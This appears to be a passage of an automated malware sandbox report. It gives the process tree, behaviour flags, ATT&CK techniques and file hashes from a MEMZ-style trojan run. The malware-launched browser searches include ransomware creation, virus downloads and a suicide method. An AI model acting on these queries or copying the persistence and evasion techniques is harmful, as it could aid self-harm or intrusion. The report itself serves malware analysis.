C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10572 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11400 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+remove+a+virus4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Windows\SysWOW64\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=minecraft+hax+download+no+virus4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+buy+weed4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+get+money4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=the+memz+are+real4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵
-
C:\Windows\SysWOW64\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\devmgmt.msc"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\mmc.exe"C:\Windows\System32\devmgmt.msc" "C:\Windows\System32\devmgmt.msc"5⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus.exe4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=best+way+to+kill+yourself4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Windows\SysWOW64\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"4⤵
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+remove+memz+trojan+virus4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=vinesauce+meme+collection4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=is+illuminati+real4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://softonic.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x9c,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://pcoptimizerpro.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b454⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus.exe4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://play.clubpenguin.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=john+cena+midi+legit+not+converted4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2ec 0x4a41⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47181⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Bootkit
1Hidden Files and Directories
1Defense Evasion
File Deletion
1File Permissions Modification
1Modify Registry
3Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@WanaDecryptor@.exe.lnkFilesize
1KB
MD502464025879fcc9ba73bdda98215dd16
SHA1297b033cfdfa5f7ea63e6ba0f811e4317957bf23
SHA25640bb9f6b4542411d8b2c0ec5c75385e38daf354b96f488db27837a206ea0e4b8
SHA512e1a9741da8998b6b8fffdf6c9f807bcde9a9f3762800e250e047041b3a72397842ddfa91c97727fe027409b306ddaff2f8105e7c22fa9f6c9201359982c367e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD578c7656527762ed2977adf983a6f4766
SHA121a66d2eefcb059371f4972694057e4b1f827ce6
SHA256e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296
SHA5120a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5099b4ba2787e99b696fc61528100f83f
SHA106e1f8b7391e1d548e49a1022f6ce6e7aa61f292
SHA256cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8
SHA5124309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD55dfd03b3dd67c8af2b893955484c8135
SHA1e3ed2f54df118cdfda354d35f2d5e8106ac68f10
SHA2562452df28ce2af6022512073064da94fbb8005db6e3fc4d07e6cb66a54397fc40
SHA512fc8ebc547b165360a0c1204c352069c9fb2225038a4e30b31e4a083a45ad959cd4149c1c65e4935404667c7134d497d1b271136ebf194b1963a1fa8940aae58c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\283d7801-ac43-4a97-b1ff-23b06d4d53e0.tmpFilesize
5KB
MD569055a8cb433bdf3f98af9d92bcec85e
SHA1bf2b7e6d1edf052e1ad5d870b6ff042b8b28d948
SHA256852344014a6ab5783704c585d2bbfe90b3110a608def9a224ee365229c470e26
SHA512737c203a49c237be5822d15dc5f8ecff4c425325bf5761fe6429c8f0cdebbeeb8bc35423a714619cc65139a388d200cec7617c4ed568363f5fdd6be9a5c812f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003Filesize
160KB
MD567145d1dd8c7201ad506c8734df41708
SHA19f10d87858deb8ee394d47a6268494905ee9f0c0
SHA256e0ebeeb232953726660519b937e1cadaf1cb2461e8c044044ff2e9a481f085a0
SHA512cbf26927e90100331eb8cb94bbf4da6ab431e7dc4919ca6068e672cb07b2d938351d502770433707e98bbc506297fa221dced4fbaf3af92d281da7d18f80c95a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\713c71b0f89a67d6_0Filesize
288B
MD5dc82ed6ac9f84b83fd9c20b5d1292c03
SHA1e96c1aecef3637dfd6d335bd282e129fbbcb3ace
SHA256c9bb9aaf2a3f9ba80143a720da25e4becb889779af3d8f793255d6f3153b58ed
SHA512723894243dd31a027663b0d6860d5a384c1ff1f86092785afb548679ac2d69ff236dd6943f99fd9bfef388e707f41c1364c3f9804bf6a042ec185014db532a7f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fa5ab2f1b47efd01_0Filesize
335KB
MD58c65f22bc3f280855ce4d2c9d086364a
SHA152eb0c79ed3a7919ec67a90a67d0ad016f6eb2ac
SHA2567359add898121ec7108e4fae88fdebc21b38e121209233a1b9245355f46c064f
SHA51268bc9e0ab15a06be947480a7c43567b04b2d8a60f78ad3d69ac85a754120a9a9c6ef49cb517e2584e2d9c5382adbe1db9398d689badfd5c9a20b6abb316dede0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-indexFilesize
144B
MD5ecc0b1959a76b00be5978bb950db1563
SHA1136ad329879be525cd0af4da7790a3ebc1a9e1d6
SHA256097eb339a51e24f43805d9a684cbf3913ca6ccc29a92b08b755289ded083d3e1
